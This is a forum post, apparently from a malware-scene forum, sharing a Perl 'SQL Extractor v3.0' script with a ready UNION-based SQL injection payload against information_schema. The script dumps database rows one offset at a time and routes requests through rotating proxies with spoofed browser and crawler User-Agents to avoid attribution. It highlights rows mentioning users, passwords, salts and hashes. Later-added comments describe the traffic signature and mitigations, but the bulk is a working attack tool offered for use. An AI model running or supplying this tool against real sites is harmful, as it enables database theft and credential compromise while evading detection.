[+]Topic: Code
[+]Von: ShaQ
[+]Return: Code


SQL Database Extractor!

Proxy Support + Proxy Switcher,
UserAgent Switcher
Highlights some special words

How to use:

perl sql_extract.pl "http://localhost/cgi-bin/index.cgi?id=2'+union+ 
select+1,2,concat_ws(0x203a20,table_schema,table_name,column_name),4,5+
from+information_schema.columns+limit+NUM,1-- f foobar" 900 database.txt


#!/usr/bin/perl -w
#===== SQL EXTRACTOR V3.0 =======================================================#
#==                                                                            ==#
#===== InfoZ ====================================================================#
#==                                                                            ==#
#==  Code:    Perl                                                             ==#
#==  Coder:   ShaQ                                                             ==#
#==  Type:    SQL Extractor v3.0                                               ==#
#==  SiteZ:   Vxnetw0rk.ws                                                     ==#
#==  Contact: Private Message                                                  ==#
#==  GreeZ:   All Members of VXnet. I love you :D                              ==#
#==                                                                            ==#
#===== Usage ====================================================================#
#==                                                                            ==#
#==  perl $0 "Query with Limit NUM,1" StartNum FileToSave                      ==#
#==                                                                            ==#
#==  Example :                                                                 ==#
#==  perl sql_extract.pl "http://localhost/cgi-bin/index.cgi?id=2'+union+      ==#
#==  select+1,2,concat_ws(0x203a20,table_schema,table_name,column_name),4,5+   ==#
#==  from+information_schema.columns+limit+NUM,1-- f foobar" 900 database.txt  ==#
#==                                                                            ==#
#================================================================================#
#
# Purpose: takes a URL from the command line that already contains a
# UNION-based SQL injection with a NUM placeholder, requests it repeatedly with
# NUM replaced by an increasing row offset, and prints/logs one
# "a : b : c" row per response.
#
# What this traffic looks like from the server side (derived from the code and
# the usage example above):
#   * the query string carries `union select`, `concat_ws(...)` with a hex
#     separator literal, and, in the example, `information_schema.columns`;
#   * consecutive requests are identical except for the LIMIT offset, which
#     increases by one per returned row;
#   * the User-Agent header is re-drawn for every request from the fixed list
#     below, which includes search-engine crawler strings, and the HTTP proxy is
#     re-drawn as well, so neither User-Agent nor client address is a stable
#     correlation key. Correlate on the request path and query content instead.
# The underlying flaw is on the target: the `id` parameter reaches a SQL
# statement unparameterised. Bound parameters on the application side and a
# database account without read access to unneeded schemas are the mitigations.

use strict; use warnings; use Term::ANSIColor qw(:constants); use LWP::UserAgent;

# --- Proxies --- #
# Hard-coded HTTP proxies; one is drawn at random before every request.
my @proxies = ("89.28.178.40:8080", "94.23.2.182:8118", "109.86.220.235:3128");

# --- UserAgents --- #
# Fixed pool of User-Agent strings; one is drawn at random before every request.
# NOTE(review): the line break inside the "Yahoo! Slurp" literal is reproduced
# as it appears on the page; it is presumably a wrapping artifact of the
# listing rather than part of the intended string.
my @agents = ("Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
    "Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
    "Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "msnbot/1.1 (+http://search.msn.com/msnbot.htm)",
    "Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008061920 IceCat/3.0-g1",
    "Mozilla/5.0 (compatible; Konqueror/3.2; Linux 2.6.2) (KHTML, like Gecko)",
    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
    "Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00",
    "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.8) Gecko/20080528 Fedora/2.24.3-4.fc10 Epiphany/2.22 Firefox/3.0",
    "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en; rv:1.9.0.10pre) Gecko/2009041800 Camino/2.0b3pre (like Firefox/3.0.10pre)/0.A.B.C Safari/525.13",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
    "Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)");

# Element counts (array in scalar context), used as the upper bound for rand().
my $proxyCount = @proxies;
my $agentCount = @agents;
# Proxies for which a request has failed; setProxy() skips these.
my @downlist = ();
# Proxy currently configured on $ua, as "host:port".
my $proxy = "";

# Three positional arguments are required: the query URL, the starting row
# offset, and the output file name.
if (@ARGV < 3) {usage();}
my ($query,$StartNum,$FileToSave) = @ARGV;

# Separator handling: the tests are tried in order, and the first substitution
# that applies rewrites the first occurrence of the hex separator literal in
# the query to 0x3a3a ("::"), which is the delimiter the response parser in
# scan() splits on. A query with none of the three literals is rejected.
if ($query =~ /0x3a/) {
    $query =~ s/0x3a/0x3a3a/;
} elsif ($query =~ /0x3a3a/) {
} elsif ($query =~ /0x203a20/) {
    $query =~ s/0x203a20/0x3a3a/;
} else {error("Concat_ws split must be 0x3a , 0x3a3a or 0x203a20");exit;}

# The query must contain the NUM placeholder that scan() replaces per request.
if ($query !~ /NUM/) {error("No NUM found", 1)}

# One shared user agent object; its agent string and proxy are reassigned
# before every request.
my $ua = LWP::UserAgent->new();
scan();

# scan: request loop.
# Opens $FileToSave for writing on the bareword handle W, then loops: draw a
# User-Agent and a proxy, replace the first NUM in the query with $StartNum,
# issue a GET, and parse the body. Reads and updates the file-level variables
# $query, $StartNum, $proxy, @downlist and $ua. Does not return normally; the
# loop ends through error(..., 1), which exits the process.
sub scan {
    # '>' mode: the file is created or truncated each time this line runs.
    # The result of open() is not checked.
    open(W,'>',$FileToSave);
    while(1) {
        # New random User-Agent header for this request.
        $ua->agent($agents[int(rand($agentCount))]);
        setProxy();
        my $str = $query;
        # Only the first NUM is replaced (no /g).
        $str =~ s/NUM/$StartNum/;
        my $response = $ua->get($str);
        if(!$response->is_success) {
            # Any unsuccessful response is attributed to the proxy: it is added
            # to @downlist and scan() is entered again from the top, including
            # the open() above.
            error("Proxy down?\n$proxy skipped...", 0);
            push(@downlist, $proxy);
            scan();
        }
        # Looks for three fields separated by "::" in the response body.
        # Without /s, `.` does not match a newline, so all three captures come
        # from a single line of the body; the groups are greedy.
        if ($response->content =~ m/(.*)::(.*)::(.*)/ ) {
            my ($t1, $t2, $t3) = ($1, $2, $3);
            # Rows whose fields mention credential-like names are printed in
            # bold green on the terminal; all other rows are printed plainly.
            if($t1 =~ /user|admin|email|pass|salt|hash/i || $t2 =~ /user|admin|email|pass|salt|hash/i || $t3 =~ /user|admin|email|pass|salt|hash/i) {
                print GREEN, BOLD, "[$StartNum] $t1 : $t2 : $t3\n", RESET;
            } else { 
                print "[$StartNum] $t1 : $t2 : $t3\n";
            }
            # Every row is also appended to the output file, uncoloured.
            print W "[$StartNum] $t1 : $t2 : $t3\n";
            # Next request asks for the following row offset.
            $StartNum++;
        } else {error("I hope this Result is nice for you :P", 1);}  # no "::" triple in the body: close W and exit
    }
}

# setProxy: draws a random entry from @proxies into $proxy, calls itself again
# while the drawn entry is listed in @downlist, then configures $ua to send
# http:// requests through it.
sub setProxy {
    $proxy = $proxies[int(rand($proxyCount))];
    setProxy() if(grep $_ eq $proxy, @downlist);
    $ua->proxy('http', 'http://' . $proxy);
}

# usage: prints the command-line synopsis and exits.
sub usage {
    print "================ USAGE =================\n";
    print YELLOW, BOLD, "perl $0 \"query with Limit NUM,1\" StartNum FileToSave", RESET, "\n";
    print "========================================\n";
    exit;
}

# error: prints the message in $_[0] in bold red inside a banner. When the
# second argument equals 1, closes the output handle W and exits the process;
# otherwise returns to the caller.
sub error {
    print "================ INFOZ =================\n";
    print RED, BOLD, $_[0], RESET, "\n";
    print "========================================\n";
    if($_[1] == 1) {
        close(W);
        exit;
    }
}